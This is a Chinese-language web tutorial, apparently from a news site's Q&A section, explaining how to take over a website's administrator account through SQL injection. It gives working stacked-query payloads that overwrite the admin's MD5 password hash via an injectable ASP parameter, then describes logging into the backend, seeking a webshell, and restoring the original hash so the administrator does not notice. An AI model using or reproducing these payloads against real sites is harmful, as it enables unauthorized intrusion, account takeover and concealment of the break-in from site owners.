云南龙网

  1. 首页 > 云知道 > >

注入修改系统管理员密码实用技巧

云知道

注入点已经找到:xxx.com/book.asp?id=1996 我刚已经用NB检测过了 。可以看到,存在表段 shop_admin 。
可是密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [passWord]:d4716077c2ba075c 我们来尝试欺骗 。可以看出,欺骗是没戏滴 。那咋办?难道要跑密码?那得浪费多少时间和内存啊?
下面我来介绍一种新方法:注射 。注射的语句如下: ;update shop_admin set password=’新MD5加密密码’ where password=’d4716077c2ba075c’-- 比如,我需要把zhuyaod的密码改成wmmhacker,我们首先要先获得wmmhacker通过MD5加密后的十二位密码 这里用明小子的工具就能转换了 。wmmhacker - f8dc763194f29433 ;update shop_admin set password=’f8dc763194f29433’ where password=’d4716077c2ba075c’-- 我们来测试 。看见了,页面没有返回错误,表示成功了 。
现在我们对shop_admin表段下的密码做重新解猜 。[adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433 大家对比一下,已经改变了 。现在我们可以登陆了 。进来了 。呵呵 。就到这里了吧 。值得提一句的是,我们进了后台,然后想办法拿到WEBSHELL 。
接着,别忘了把管理员密码还原 。不然他会发现滴! ;update shop_admin set password=’d4716077c2ba075c’ where password=’f8dc763194f29433’--
【注入修改系统管理员密码实用技巧】

    推荐阅读


    上一篇:隔夜珍珠怎么恢复q弹

    下一篇:支付宝停车场“无感支付”开通了哪几个城市?